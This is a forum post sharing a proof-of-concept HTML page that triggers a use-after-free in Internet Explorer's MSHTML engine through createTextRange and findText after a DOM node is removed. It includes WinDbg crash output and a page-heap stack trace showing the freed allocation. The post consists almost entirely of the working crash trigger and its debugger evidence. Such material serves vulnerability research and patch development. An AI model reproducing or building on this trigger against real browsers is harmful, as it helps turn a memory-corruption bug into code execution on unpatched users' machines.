Older bug but surely could be of some help to someone (someday):

Code:
<!doctype html><html><HEAD><title>case66876.html</title>
<meta http-equiv="Content-type" content="text/html;charset=UTF-8">
<style>
*:nth-child(5)::before {
    content: 'moof';
}
</style></HEAD>
<body>
<script>


elem1 = document.createElement('script')
elem2 = document.createElement('time')
elem3 = document.createElement('h1')
elem4 = document.createElement('figcaption')
elem5 = document.createElement('h3')
elem6 = document.createElement('details')


document.body.appendChild(elem1)
elem1.appendChild(elem2)
elem1.appendChild(elem3)
elem1.appendChild(elem4)
elem1.appendChild(elem5)
elem1.appendChild(elem6)
    
rangeTxt = document.body.createTextRange()
elem2.parentNode.removeChild(elem2)
rangeTxt.findText(unescape('%u4141'), -1)


</script></body></html>
Code:
2:037> g(310.180): C++ EH exception - code e06d7363 (first chance)
(310.c60): Unknown exception - code 80010108 (first chance)
(d48.314): C++ EH exception - code e06d7363 (first chance)
(d48.314): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=0a742fd0 ecx=00000000 edx=00000000 esi=0a742fd0 edi=0000034d
eip=68506ac6 esp=052ab458 ebp=052ab614 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
MSHTML!CTxtPtr::FindComplexHelper+0x344:
68506ac6 8b7310          mov     esi,dword ptr [ebx+10h] ds:0023:0a742fe0=????????






2:041> !heap -p -a ebx
    address 0a93afd0 found in
    _DPH_HEAP_ROOT @ 201000
    in free-ed allocation (  DPH_HEAP_BLOCK:         VirtAddr         VirtSize)
                                    a9205b0:          a93a000             2000
    736890b2 verifier!AVrfDebugPageHeapFree+0x000000c2
    779966ac ntdll!RtlDebugFreeHeap+0x0000002f
    7795a13e ntdll!RtlpFreeHeap+0x0000005d
    779265a6 ntdll!RtlFreeHeap+0x00000142
    765fc484 kernel32!HeapFree+0x00000014
    67f89eac MSHTML!CTreePos::Release+0x0000004e
    6801541f MSHTML!CMarkup::Remove+0x00000030
    68aa2de0 MSHTML!memcpy+0x0004133e
    684a3663 MSHTML!CGeneratedContentInfo::ReleaseNodes+0x00000136
    68441a94 MSHTML!CElement::ComputeFormatsVirtual+0x00002641
    684e8f43 MSHTML!CElement::ComputeFormats+0x00000208
    67fa8cf3 MSHTML!CTreeNode::ComputeFormats+0x00000093
    67fa8d5c MSHTML!CTreeNode::ComputeFormatsHelper+0x0000003a
    68365cdb MSHTML!CTreeNode::GetFancyFormat+0x0000003e
    684948b8 MSHTML!CElement::IsElementBlockInContext+0x00000026
    688d6ae2 MSHTML!CTxtPtr::FindComplexHelper+0x00000360
    688d9545 MSHTML!CTxtPtr::FindTextW+0x00000721
    688c82ed MSHTML!CMarkupPointer::FindTextW+0x00000084
    688c8b0c MSHTML!CMarkupPointer::FindTextW+0x00000095
    688d2b01 MSHTML!CAutoRange::findText+0x00000155
    6882f0e3 MSHTML!CFastDOM::CTextRange::Trampoline_findText+0x000000ed
    675835f4 jscript9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x00000185
    67560d57 jscript9!Js::InterpreterStackFrame::Process+0x00001bd7
    6755f6ad jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x00000305
Cheers!
b0nd